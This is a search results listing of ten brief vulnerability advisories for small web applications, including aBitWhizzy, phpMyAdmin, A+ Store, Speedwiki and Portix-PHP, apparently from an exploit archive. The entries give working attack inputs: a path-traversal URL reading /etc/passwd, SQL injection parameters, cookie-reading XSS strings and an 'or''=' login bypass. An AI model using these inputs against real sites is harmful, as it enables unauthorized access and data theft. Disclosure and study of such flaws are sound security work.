10 matches found
aBitWhizzy - 'abitwhizzy.php' Information Disclosure
aBitWhizzy local file include vendor site: http://www.unverse.net/abitwhizzy/ product : aBitWhizzy bug:local file include global risk : high http://site.com/abitwhizzy.php?f=../../../../../../../etc/passwd laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [email protected] milw0rm.com...
infinsql.txt
product:Infinitytechs Restaurants CM bug:injection sql risk:medium injection sql: /rating.asp?id='sql /mealrest.asp?mealid='sql /resdetails.asp?resid='sql laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [email protected]...
phpmyadmin.txt
vendor site:http://phpmyadmin.net/ product:PhpMyAdmin all version bug: xss permanent & full path disclosure global risk:high xss post : 1 create a table , with whatever name , when it's done , go to "operation" /dboperations.php and add a comment on your table with: '"alertdocument.cookie the...
A+ Store E-Commerce[ injection sql & xss (post) ]
vendor site:http://www.webinhabit.com/ product:A+ Store E-Commerce bug:injection sql & xss post risk:medium injection sql get : http://site.com/browse.asp?ParentID='sql xss post : in /accountlogin.asp: username =...
funkyasp10.txt
vendor site:http://www.funkyasp.co.uk/ product:FunkyASP Glossary v1.0 bug:injection sql risk:medium injection sql : http://www.demo.funkyasp.co.uk/demo/glossary/glossary.asp?alpha='sql laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: [email protected]...
astoreecom.txt
vendor site:http://www.webinhabit.com/ product:A+ Store E-Commerce bug:injection sql & xss post risk:medium injection sql get : http://site.com/browse.asp?ParentID='sql xss post : in /accountlogin.asp: username = '"alertdocument.cookie'"alertdocument.cookie passwd =...
carsite.txt
Car Site Manager injection sql & xss get vendor site:http://www.mginternet.com/ product:Car Site Manager bug:injection sql risk:medium injection sql : http://site.com/csm/asp/detail.asp?l=&p='sql http://site.com/csm/asp/listings.asp?l='sql http://site.com/csm/asp/listings.asp?s=search&typ='sql...
speedwiki20.txt
product :Speedwiki 2.0 vendor site: http://speedywiki.sourceforge.net/ risk:critical a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms path : /speedywiki/index.php?upload=1 xss get :...
Speedwiki 2.0 Arbitrary File Upload Vulnerability
product :Speedwiki 2.0 vendor site: http://speedywiki.sourceforge.net/ risk:critical a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms path : /speedywiki/index.php?upload=1 xss get :...
Portix-PHP [login bypass & xss (post)]
product:Portix-PHP vendor site :http://portix2.be risk : medium log with : username: 'or''=' passwd : 'or''=' xss post on the forum , vulnerable fields : titre auteur laurent gaffiй & benjamin mossй http://s-a-p.ca/ contact: [email protected]...